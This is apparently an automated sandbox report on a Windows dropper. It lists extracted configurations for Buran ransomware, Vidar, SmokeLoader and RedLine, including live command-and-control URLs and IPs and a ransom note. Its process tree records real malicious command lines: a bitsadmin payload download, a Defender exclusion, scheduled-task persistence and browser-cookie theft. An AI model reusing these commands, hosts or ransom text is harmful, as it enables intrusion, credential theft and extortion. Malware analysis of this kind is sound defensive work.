Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 00:00

General

  • Target

    8 (20).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. Do you really want to restore your files? Write to email: udacha123@mail2tor.com telegram @udacha123yes 200$=24 hour Attention !!! in 24 hours the price will increase 3 times(400$) Your personal ID: 3FF-C10-7DF Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

udacha123@mail2tor.com

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

zero_5k

C2

86.106.181.209:18845

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE DTLoader Binary Request M2
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Generic gate[.].php GET with minimal headers
  • suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 25 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1012
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1108
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        PID:1068
        • C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
          C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
          2⤵
          • Executes dropped EXE
          • Checks BIOS information in registry
          PID:3816
          • C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\ScreanDriver.exe
            "C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\ScreanDriver.exe"
            3⤵
            • Suspicious behavior: GetForegroundWindowSpam
            PID:1504
        • C:\Users\Admin\AppData\Roaming\sehbdjs
          C:\Users\Admin\AppData\Roaming\sehbdjs
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:5436
          • C:\Users\Admin\AppData\Roaming\sehbdjs
            C:\Users\Admin\AppData\Roaming\sehbdjs
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:2224
        • C:\Users\Admin\AppData\Roaming\vdhbdjs
          C:\Users\Admin\AppData\Roaming\vdhbdjs
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4148
        • C:\Users\Admin\AppData\Roaming\sehbdjs
          C:\Users\Admin\AppData\Roaming\sehbdjs
          2⤵
          • Suspicious use of SetThreadContext
          PID:1672
          • C:\Users\Admin\AppData\Roaming\sehbdjs
            C:\Users\Admin\AppData\Roaming\sehbdjs
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:5536
        • C:\Users\Admin\AppData\Roaming\vdhbdjs
          C:\Users\Admin\AppData\Roaming\vdhbdjs
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:6084
        • C:\Users\Admin\AppData\Roaming\sehbdjs
          C:\Users\Admin\AppData\Roaming\sehbdjs
          2⤵
          • Suspicious use of SetThreadContext
          PID:4324
          • C:\Users\Admin\AppData\Roaming\sehbdjs
            C:\Users\Admin\AppData\Roaming\sehbdjs
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:5388
        • C:\Users\Admin\AppData\Roaming\vdhbdjs
          C:\Users\Admin\AppData\Roaming\vdhbdjs
          2⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4416
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1880
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2808
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
            • Modifies registry class
            PID:2688
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2676
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2476
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1424
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1292
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1228
                    • C:\Users\Admin\AppData\Local\Temp\8 (20).exe
                      "C:\Users\Admin\AppData\Local\Temp\8 (20).exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:780
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2356
                        • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2744
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3336
                            • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_2.exe
                              sonia_2.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:2136
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_1.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2716
                            • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.exe
                              sonia_1.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4052
                              • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_1.exe" -a
                                6⤵
                                • Executes dropped EXE
                                PID:204
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4020
                            • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_3.exe
                              sonia_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              PID:2088
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 900
                                6⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4544
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:376
                            • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_4.exe
                              sonia_4.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1000
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                            4⤵
                              PID:3480
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3288
                              • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_6.exe
                                sonia_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of WriteProcessMemory
                                PID:3844
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3972
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4988
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                    PID:6092
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                      PID:5444
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1556
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 448
                                  4⤵
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3836
                          • \??\c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                            1⤵
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3792
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                              • Checks processor information in registry
                              • Modifies data under HKEY_USERS
                              • Modifies registry class
                              PID:184
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                              • Drops file in System32 directory
                              • Checks processor information in registry
                              • Modifies data under HKEY_USERS
                              • Modifies registry class
                              PID:4884
                          • C:\Users\Admin\AppData\Local\Temp\7zS439E3B14\sonia_5.exe
                            sonia_5.exe
                            1⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:3332
                            • C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe
                              "C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:4828
                              • C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe
                                C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe
                                3⤵
                                • Executes dropped EXE
                                PID:1932
                              • C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe
                                C:\Users\Admin\Documents\xHTl3I2ftyt4KsCCmuZPYIAe.exe
                                3⤵
                                • Executes dropped EXE
                                PID:4580
                            • C:\Users\Admin\Documents\UNbKrsznPQUKHHCWcBLSZmHa.exe
                              "C:\Users\Admin\Documents\UNbKrsznPQUKHHCWcBLSZmHa.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4976
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                3⤵
                                  PID:5768
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    4⤵
                                    • Kills process with taskkill
                                    PID:5852
                              • C:\Users\Admin\Documents\ZnS0eScXZBaiFJj0oPjL3iEV.exe
                                "C:\Users\Admin\Documents\ZnS0eScXZBaiFJj0oPjL3iEV.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4948
                              • C:\Users\Admin\Documents\3v6LfliatyWGv_9ROQdgQMET.exe
                                "C:\Users\Admin\Documents\3v6LfliatyWGv_9ROQdgQMET.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4940
                              • C:\Users\Admin\Documents\8lAIJUqDSEfrcr87apNi3ld_.exe
                                "C:\Users\Admin\Documents\8lAIJUqDSEfrcr87apNi3ld_.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4932
                              • C:\Users\Admin\Documents\KGU42QjW86OzoNQHA7ZSfStS.exe
                                "C:\Users\Admin\Documents\KGU42QjW86OzoNQHA7ZSfStS.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops startup file
                                PID:4924
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  3⤵
                                  • Executes dropped EXE
                                  PID:5704
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4312
                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  3⤵
                                    PID:4148
                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5948
                                • C:\Users\Admin\Documents\PtaHETeGJBEoGh0pROwjywIP.exe
                                  "C:\Users\Admin\Documents\PtaHETeGJBEoGh0pROwjywIP.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4916
                                  • C:\Users\Public\run.exe
                                    C:\Users\Public\run.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:984
                                    • C:\Users\Public\run.exe
                                      C:\Users\Public\run.exe
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4420
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                        5⤵
                                          PID:5924
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            6⤵
                                            • Delays execution with timeout.exe
                                            PID:4356
                                    • C:\Users\Public\run2.exe
                                      C:\Users\Public\run2.exe
                                      3⤵
                                        PID:4584
                                        • C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
                                          "C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          PID:2876
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9EE2.tmp.cmd""
                                            5⤵
                                              PID:4956
                                              • C:\Windows\system32\timeout.exe
                                                timeout 4
                                                6⤵
                                                • Delays execution with timeout.exe
                                                PID:5388
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /f /sc MINUTE /mo 1 /tn "MicrosoftApi" /tr "'C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"'
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Creates scheduled task(s)
                                                PID:4584
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9ED1.tmp.cmd""
                                              5⤵
                                                PID:4628
                                                • C:\Windows\system32\timeout.exe
                                                  timeout 4
                                                  6⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5440
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi
                                                  6⤵
                                                    PID:5188
                                          • C:\Users\Admin\Documents\dE_9K54DZXU0muG1HFHi8bAv.exe
                                            "C:\Users\Admin\Documents\dE_9K54DZXU0muG1HFHi8bAv.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4904
                                            • C:\Users\Admin\Documents\dE_9K54DZXU0muG1HFHi8bAv.exe
                                              "C:\Users\Admin\Documents\dE_9K54DZXU0muG1HFHi8bAv.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5360
                                          • C:\Users\Admin\Documents\K2uj9dJ1SG3rizYY2UokRM3Z.exe
                                            "C:\Users\Admin\Documents\K2uj9dJ1SG3rizYY2UokRM3Z.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4892
                                          • C:\Users\Admin\Documents\jmsBA71hGVqUvvMFB2I0brb8.exe
                                            "C:\Users\Admin\Documents\jmsBA71hGVqUvvMFB2I0brb8.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4876
                                            • C:\Users\Admin\Documents\jmsBA71hGVqUvvMFB2I0brb8.exe
                                              C:\Users\Admin\Documents\jmsBA71hGVqUvvMFB2I0brb8.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3572
                                          • C:\Users\Admin\Documents\HtZqO9CvP2fY7GYW4p8hCfa9.exe
                                            "C:\Users\Admin\Documents\HtZqO9CvP2fY7GYW4p8hCfa9.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4868
                                            • C:\Users\Admin\AppData\Roaming\updata.exe
                                              C:\Users\Admin\AppData\Roaming\updata.exe updata
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:5988
                                              • C:\Users\Admin\AppData\Roaming\updata.exe
                                                "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:1752
                                              • C:\Users\Admin\AppData\Roaming\updata.exe
                                                "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:1648
                                              • C:\Users\Admin\AppData\Roaming\updata.exe
                                                "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4652
                                          • C:\Users\Admin\Documents\SBLWPnUdVrwD9G4G8pl_s4yK.exe
                                            "C:\Users\Admin\Documents\SBLWPnUdVrwD9G4G8pl_s4yK.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4856
                                            • C:\Users\Admin\Documents\SBLWPnUdVrwD9G4G8pl_s4yK.exe
                                              "C:\Users\Admin\Documents\SBLWPnUdVrwD9G4G8pl_s4yK.exe"
                                              3⤵
                                                PID:5752
                                            • C:\Users\Admin\Documents\qmM2uxyKPO9TwlVHFGXlxCuD.exe
                                              "C:\Users\Admin\Documents\qmM2uxyKPO9TwlVHFGXlxCuD.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4840
                                              • C:\Users\Admin\Documents\qmM2uxyKPO9TwlVHFGXlxCuD.exe
                                                C:\Users\Admin\Documents\qmM2uxyKPO9TwlVHFGXlxCuD.exe
                                                3⤵
                                                • Executes dropped EXE
                                                PID:6048
                                            • C:\Users\Admin\Documents\lpo5Cx8sl8KArNDjvalwFe6D.exe
                                              "C:\Users\Admin\Documents\lpo5Cx8sl8KArNDjvalwFe6D.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4280
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 484
                                                3⤵
                                                • Program crash
                                                PID:4564
                                            • C:\Users\Admin\Documents\zElZybmeEllb3VgMdEzWE9Cu.exe
                                              "C:\Users\Admin\Documents\zElZybmeEllb3VgMdEzWE9Cu.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:5056
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                3⤵
                                                  PID:5408
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                  3⤵
                                                    PID:5028
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                    3⤵
                                                      PID:5808
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                      3⤵
                                                        PID:4392
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                        3⤵
                                                          PID:4960
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                          3⤵
                                                            PID:3556
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstA9A5.tmp\tempfile.ps1"
                                                            3⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:1168
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                            3⤵
                                                            • Download via BitsAdmin
                                                            PID:5784
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
